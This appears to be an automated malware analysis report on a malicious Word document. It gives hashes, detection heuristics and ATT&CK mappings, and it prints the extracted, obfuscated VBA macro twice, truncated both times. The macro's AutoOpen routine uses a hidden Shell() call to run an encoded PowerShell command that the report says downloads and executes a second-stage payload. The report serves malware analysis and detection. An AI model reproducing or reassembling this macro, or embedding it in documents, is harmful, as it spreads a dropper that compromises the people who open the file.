Office (OLE) malware analysis — malicious · 1e12bea93b18add3

MALICIOUS

Office (OLE)

109.8 KB Created: 2018-05-24 08:03:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 1c38b73658b558f22ea41e461668a1bd SHA-1: 3f73558f0fc4fa5de2f542e6497b237846e56e3b SHA-256: 1e12bea93b18add3994030cffe4913cce588d9b76fe1a66a84948586dd89ca7e

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function that calls the Shell() function. This function is used to execute a PowerShell command, which is obfuscated but appears to be designed to download and execute a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent-6555972-0' further supports the dropper functionality.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6555972-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6555972-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12240 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12240 bytes
SHA-256: `f2e847a48855fb3aed41a9c7c730ae5d65673aaba7a0efb713eab5c2fc429e72`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "crqDliEDdIju" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function HqjLdTSsw() On Error Resume Next bYRwED = zjOsv - Cos(fGQrzl) * 1 - Chr(82230) / 54869 - ChrB(XjDrm) sOKkj = 6960 KVzcQC = JuWij - Cos(MoSjI) * 1 - Chr(27530) / 9446 - ChrB(BlsMQ) EUEHOn = 89698 HqjLdTSsw = jsYzRs + ufzqmcp + YcEwqIETM + EGrRaGOmDuU + tufCOmjX + VlkQcr + NpFHTlA + hasHvBHc + UAuuLlM utVUoZ = dJZLZ - Cos(EwdcS) * 1 - Chr(97514) / 46783 - ChrB(kFQzN) pqOPsS = 32039 End Function Sub Autoopen() On Error Resume Next YLnafG = bTArf - Cos(Xafwp) * 1 - Chr(42921) / 73061 - ChrB(oEVaa) mvJTG = 85574 fsHjVuKwT (HqjLdTSsw) XRosT = lImPI - Cos(zRPjTD) * 1 - Chr(93223) / 58977 - ChrB(kHSzEp) jJhknq = 913 End Sub Function fsHjVuKwT(dKlMhN) On Error Resume Next qDWEA = CpNrc - Cos(XLpPKN) * 1 - Chr(50195) / 74895 - ChrB(WsOcA) chXvHR = 11686 Phsiji = EHbrO - Cos(TSaZQ) * 1 - Chr(26018) / 98168 - ChrB(LHczY) HqwVh = 32585 dDRXvTsZ = Shell(jMHisH + Chr(vbKeyP) + mLPhVUtjaVL + dKlMhN, vbHide) aiRjq = sRkmk - Cos(IJPwWq) * 1 - Chr(7274) / 13518 - ChrB(EZPiL) KOLGK = 94851 End Function Attribute VB_Name = "tjJpZIG" Function jsYzRs() On Error Resume Next jsARM = cAFzj - Cos(zsvKhS) * 1 - Chr(4822) / 17088 - ChrB(AvFii) HcFWLa = 48226 QzCjriXUntD = "owersHeLL" + " -WinDowsTyle h" + "idden -e I" + "ABJAEUAeAAg" + "ACgAIAAoA" + "CgAKAAiAHsAMwA3" + "AH0AewAzADAAfQ" + "B7ADEAMQB9A" + "HsANAA2" + "AH0Aew" tJENn = AQsjf - Cos(kArQo) * 1 - Chr(51398) / 83334 - ChrB(fzvji) VXzbYA = 51042 BvjcvULDPMD = "AzAH0AewA4AD" + "YAfQB7ADI" + "AOAB9A" + "HsAMQAyAH0Aew" + "A4ADQAfQB7ADYAM" + "gB9AHsANAA1A" CBdEOD = jDWCO - Cos(Glohl) * 1 - Chr(67714) / 41173 - ChrB(vOUfGk) RRLfpA = 96781 kJFpR = "H0AewAzAD" + "UAfQB7ADYAOQ" + "B9AHsANgAxAH0" + "AewA3ADUA" + "fQB7ADUAMgB9AHs" + "ANwA5AH0A" + "ewA4ADAAfQB" nkLowv = YjTcOm - Cos(tmRFI) * 1 - Chr(12039) / 75253 - ChrB(YITcS) LXZEIu = 2302 QjmJr = "7ADUANAB9AHsAN" + "QAzAH0AewA" + "xADAAf" + "QB7ADEAM" + "wB9AHsAMQA" + "3AH0AewA3AD" + "cAfQB7ADYAOAB9" + "AHsAOAAyAH0AewA" + "2ADAAfQB7ADg" + "AOAB9" ZvWjBp = MdVpFX - Cos(OkrsD) * 1 - Chr(58954) / 23200 - ChrB(UWcHN) tYGsJ = 94273 FPkbwVMoAhi = "AHsAMAB9AHsANA" + "AyAH0AewA0A" + "DEAfQB7" + "ADEAOQB" + "9AHsAOQB9AHs" + "AOAB9AHsAOAA" VicEz = MfzmM - Cos(mJpMQ) * 1 - Chr(82775) / 43348 - ChrB(WaADub) SFPzva = 21059 cSfWjioODP = "zAH0AewAxAD" + "QAfQB7ADEANQ" + "B9AHsAMgA" + "2AH0A" + "ewAyADUAf" jsYzRs = QzCjriXUntD + BvjcvULDPMD + kJFpR + QjmJr + FPkbwVMoAhi + cSfWjioODP End Function Function ufzqmcp() On Error Resume Next CPnFKz = XjPsa - Cos(ELpBnM) * 1 - Chr(82509) / 91499 - ChrB(YKWota) oQobQn = 94635 obCPwQpjJU = "QB7ADIA" + "MAB9AHsANwB9A" + "HsAOAAx" + "AH0AewA1ADYA" + "fQB7AD" + "IAMQB9A" lMkwDR = BAfNtZ - Cos(INUwUq) * 1 - Chr(56867) / 68438 - ChrB(Gzpuz) wjROM = 30587 TdVmw = "HsANwAy" + "AH0AewAx" + "ADYAfQB7ADMA" + "OAB9AHs" + "AMgA0AH0" + "AewAx" + "ADgAfQB7" bssQlI = JfjIs - Cos(aHUSG) * 1 - Chr(98282) / 3433 - ChrB(iBNWoz) wwiMj = 63781 VMDqPw = "ADQAMAB9AHsA" + "NAAzA" + "H0AewA2A" + "DUAfQB7ADQA" + "OAB9AHsAM" cEEFUO = aQjCq - Cos(rPwHNO) * 1 - Chr(70340) / 92792 - ChrB(itwLTM) CvLbof = 30337 lOjoiETUhYY = "gA5AH0AewA2ADMA" + "fQB7ADQAf" + "QB7ADc" + "AMQB9AHsANgA2AH" + "0AewAzAD" BiniE = jUzTKh - Cos(WzSwql) * 1 - Chr(49028) / 21569 - ChrB(IvzqO) qPpLzk = 13206 UFqWIHDcKPc = "QAfQB7AD" + "IAMwB9A" + "HsANAA0AH0Ae" + "wA0ADcAfQ" + "B7ADUAfQB7ADE" + "AfQB7ADIAfQB7AD" aFrFzZ = rIflfw - Cos(izuqCs) * 1 - Chr(41456) / 85049 - ChrB(OXvdii) iMPPrq = 98391 ZhRbfQiKpRp = "UANwB9" + "AHsANQA4AH0Ae" + "wA4ADUAfQB7" + "ADUAMQB9" + "AHsANwA" + "wAH0AewA3ADM" blJRmT = ipwkr - Cos(IiONi) * 1 - Chr(50319) / 55574 - ChrB(CvQMIz) PjCnw = 26045 RjSrPRj = "AfQB7ADcAOAB9" + "AHsANgB9AHsAMwA" + "5AH0AewA4ADc" + "AfQB7ADU" + "ANQB9AHsA" + "NAA5AH0AewA2" + "ADQAfQB7ADI" ufzqmcp = obCPwQpjJU + Td ... (truncated)

SHA-256: f2e847a48855fb3aed41a9c7c730ae5d65673aaba7a0efb713eab5c2fc429e72

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "crqDliEDdIju"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function HqjLdTSsw()
On Error Resume Next
bYRwED = zjOsv - Cos(fGQrzl) * 1 - Chr(82230) / 54869 - ChrB(XjDrm)
sOKkj = 6960
KVzcQC = JuWij - Cos(MoSjI) * 1 - Chr(27530) / 9446 - ChrB(BlsMQ)
EUEHOn = 89698
HqjLdTSsw = jsYzRs + ufzqmcp + YcEwqIETM + EGrRaGOmDuU + tufCOmjX + VlkQcr + NpFHTlA + hasHvBHc + UAuuLlM
utVUoZ = dJZLZ - Cos(EwdcS) * 1 - Chr(97514) / 46783 - ChrB(kFQzN)
pqOPsS = 32039
End Function
Sub Autoopen()
On Error Resume Next
YLnafG = bTArf - Cos(Xafwp) * 1 - Chr(42921) / 73061 - ChrB(oEVaa)
mvJTG = 85574
fsHjVuKwT (HqjLdTSsw)
XRosT = lImPI - Cos(zRPjTD) * 1 - Chr(93223) / 58977 - ChrB(kHSzEp)
jJhknq = 913
End Sub
Function fsHjVuKwT(dKlMhN)
On Error Resume Next
qDWEA = CpNrc - Cos(XLpPKN) * 1 - Chr(50195) / 74895 - ChrB(WsOcA)
chXvHR = 11686
Phsiji = EHbrO - Cos(TSaZQ) * 1 - Chr(26018) / 98168 - ChrB(LHczY)
HqwVh = 32585
dDRXvTsZ = Shell(jMHisH + Chr(vbKeyP) + mLPhVUtjaVL + dKlMhN, vbHide)
aiRjq = sRkmk - Cos(IJPwWq) * 1 - Chr(7274) / 13518 - ChrB(EZPiL)
KOLGK = 94851
End Function


Attribute VB_Name = "tjJpZIG"
Function jsYzRs()
On Error Resume Next
jsARM = cAFzj - Cos(zsvKhS) * 1 - Chr(4822) / 17088 - ChrB(AvFii)
HcFWLa = 48226
QzCjriXUntD = "owersHeLL" + " -WinDowsTyle h" + "idden -e I" + "ABJAEUAeAAg" + "ACgAIAAoA" + "CgAKAAiAHsAMwA3" + "AH0AewAzADAAfQ" + "B7ADEAMQB9A" + "HsANAA2" + "AH0Aew"
tJENn = AQsjf - Cos(kArQo) * 1 - Chr(51398) / 83334 - ChrB(fzvji)
VXzbYA = 51042
BvjcvULDPMD = "AzAH0AewA4AD" + "YAfQB7ADI" + "AOAB9A" + "HsAMQAyAH0Aew" + "A4ADQAfQB7ADYAM" + "gB9AHsANAA1A"
CBdEOD = jDWCO - Cos(Glohl) * 1 - Chr(67714) / 41173 - ChrB(vOUfGk)
RRLfpA = 96781
kJFpR = "H0AewAzAD" + "UAfQB7ADYAOQ" + "B9AHsANgAxAH0" + "AewA3ADUA" + "fQB7ADUAMgB9AHs" + "ANwA5AH0A" + "ewA4ADAAfQB"
nkLowv = YjTcOm - Cos(tmRFI) * 1 - Chr(12039) / 75253 - ChrB(YITcS)
LXZEIu = 2302
QjmJr = "7ADUANAB9AHsAN" + "QAzAH0AewA" + "xADAAf" + "QB7ADEAM" + "wB9AHsAMQA" + "3AH0AewA3AD" + "cAfQB7ADYAOAB9" + "AHsAOAAyAH0AewA" + "2ADAAfQB7ADg" + "AOAB9"
ZvWjBp = MdVpFX - Cos(OkrsD) * 1 - Chr(58954) / 23200 - ChrB(UWcHN)
tYGsJ = 94273
FPkbwVMoAhi = "AHsAMAB9AHsANA" + "AyAH0AewA0A" + "DEAfQB7" + "ADEAOQB" + "9AHsAOQB9AHs" + "AOAB9AHsAOAA"
VicEz = MfzmM - Cos(mJpMQ) * 1 - Chr(82775) / 43348 - ChrB(WaADub)
SFPzva = 21059
cSfWjioODP = "zAH0AewAxAD" + "QAfQB7ADEANQ" + "B9AHsAMgA" + "2AH0A" + "ewAyADUAf"
jsYzRs = QzCjriXUntD + BvjcvULDPMD + kJFpR + QjmJr + FPkbwVMoAhi + cSfWjioODP
End Function
Function ufzqmcp()
On Error Resume Next
CPnFKz = XjPsa - Cos(ELpBnM) * 1 - Chr(82509) / 91499 - ChrB(YKWota)
oQobQn = 94635
obCPwQpjJU = "QB7ADIA" + "MAB9AHsANwB9A" + "HsAOAAx" + "AH0AewA1ADYA" + "fQB7AD" + "IAMQB9A"
lMkwDR = BAfNtZ - Cos(INUwUq) * 1 - Chr(56867) / 68438 - ChrB(Gzpuz)
wjROM = 30587
TdVmw = "HsANwAy" + "AH0AewAx" + "ADYAfQB7ADMA" + "OAB9AHs" + "AMgA0AH0" + "AewAx" + "ADgAfQB7"
bssQlI = JfjIs - Cos(aHUSG) * 1 - Chr(98282) / 3433 - ChrB(iBNWoz)
wwiMj = 63781
VMDqPw = "ADQAMAB9AHsA" + "NAAzA" + "H0AewA2A" + "DUAfQB7ADQA" + "OAB9AHsAM"
cEEFUO = aQjCq - Cos(rPwHNO) * 1 - Chr(70340) / 92792 - ChrB(itwLTM)
CvLbof = 30337
lOjoiETUhYY = "gA5AH0AewA2ADMA" + "fQB7ADQAf" + "QB7ADc" + "AMQB9AHsANgA2AH" + "0AewAzAD"
BiniE = jUzTKh - Cos(WzSwql) * 1 - Chr(49028) / 21569 - ChrB(IvzqO)
qPpLzk = 13206
UFqWIHDcKPc = "QAfQB7AD" + "IAMwB9A" + "HsANAA0AH0Ae" + "wA0ADcAfQ" + "B7ADUAfQB7ADE" + "AfQB7ADIAfQB7AD"
aFrFzZ = rIflfw - Cos(izuqCs) * 1 - Chr(41456) / 85049 - ChrB(OXvdii)
iMPPrq = 98391
ZhRbfQiKpRp = "UANwB9" + "AHsANQA4AH0Ae" + "wA4ADUAfQB7" + "ADUAMQB9" + "AHsANwA" + "wAH0AewA3ADM"
blJRmT = ipwkr - Cos(IiONi) * 1 - Chr(50319) / 55574 - ChrB(CvQMIz)
PjCnw = 26045
RjSrPRj = "AfQB7ADcAOAB9" + "AHsANgB9AHsAMwA" + "5AH0AewA4ADc" + "AfQB7ADU" + "ANQB9AHsA" + "NAA5AH0AewA2" + "ADQAfQB7ADI"
ufzqmcp = obCPwQpjJU + Td
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.